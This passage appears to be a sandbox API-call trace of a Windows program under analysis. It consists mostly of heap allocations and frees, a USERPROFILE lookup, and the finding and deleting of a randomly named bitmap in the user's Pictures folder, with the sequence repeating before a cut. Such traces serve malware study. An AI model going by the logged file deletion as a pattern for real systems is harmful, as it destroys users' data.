wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0256.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0256.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0256.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0256.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0256.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0256.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0256.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0256.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0256.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0256.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0256.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0256.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0256.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0256.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0256.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.996] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0256.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0256.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0256.996] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0256.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0256.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.997] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0256.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0256.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0256.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0256.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0256.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0256.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7e) returned 0x24f1fe0 [0256.998] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/waKMSqrywnXqjmY3STm.bmp", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\waKMSqrywnXqjmY3STm.bmp", lpFilePart=0x8bedfc*="waKMSqrywnXqjmY3STm.bmp") returned 0x3e [0256.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0256.998] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\waKMSqrywnXqjmY3STm.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wakmsqrywnxqjmy3stm.bmp")) returned 0x20 [0256.998] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\waKMSqrywnXqjmY3STm.bmp", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2379e0, ftCreationTime.dwHighDateTime=0x1d4cbf9, ftLastAccessTime.dwLowDateTime=0x320258a0, ftLastAccessTime.dwHighDateTime=0x1d4c668, ftLastWriteTime.dwLowDateTime=0x320258a0, ftLastWriteTime.dwHighDateTime=0x1d4c668, nFileSizeHigh=0x0, nFileSizeLow=0x11565, dwReserved0=0x1743, dwReserved1=0x4, cFileName="waKMSqrywnXqjmY3STm.bmp", cAlternateFileName="WAKMSQ~1.BMP")) returned 0xaa5960 [0256.999] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\waKMSqrywnXqjmY3STm.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wakmsqrywnxqjmy3stm.bmp")) returned 1 [0257.000] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2379e0, ftCreationTime.dwHighDateTime=0x1d4cbf9, ftLastAccessTime.dwLowDateTime=0x320258a0, ftLastAccessTime.dwHighDateTime=0x1d4c668, ftLastWriteTime.dwLowDateTime=0x320258a0, ftLastWriteTime.dwHighDateTime=0x1d4c668, nFileSizeHigh=0x0, nFileSizeLow=0x11565, dwReserved0=0x1743, dwReserved1=0x4, cFileName="waKMSqrywnXqjmY3STm.bmp", cAlternateFileName="WAKMSQ~1.BMP")) returned 0 [0257.000] FindClose (in: hFindFile=0xaa5960 | out: hFindFile=0xaa5960) returned 1 [0257.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0257.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0257.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0257.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0257.001] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0257.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0257.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0257.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0257.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0257.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0257.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0257.001] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0257.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0257.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0257.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0257.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0257.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0257.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0257.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0257.002] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0257.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0257.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0257.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0257.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0257.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0257.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0257.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0257.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0257.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0257.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0257.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0257.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0257.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0257.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0257.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0257.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0257.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0257.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0257.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0257.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0257.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0257.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0257.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0257.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0257.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0257.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0257.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0257.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0257.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0257.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7e) returned 0x24f1fe0 [0257.004] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/waKMSqrywnXqjmY3STm.bmp", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\waKMSqrywnXqjmY3STm.bmp", 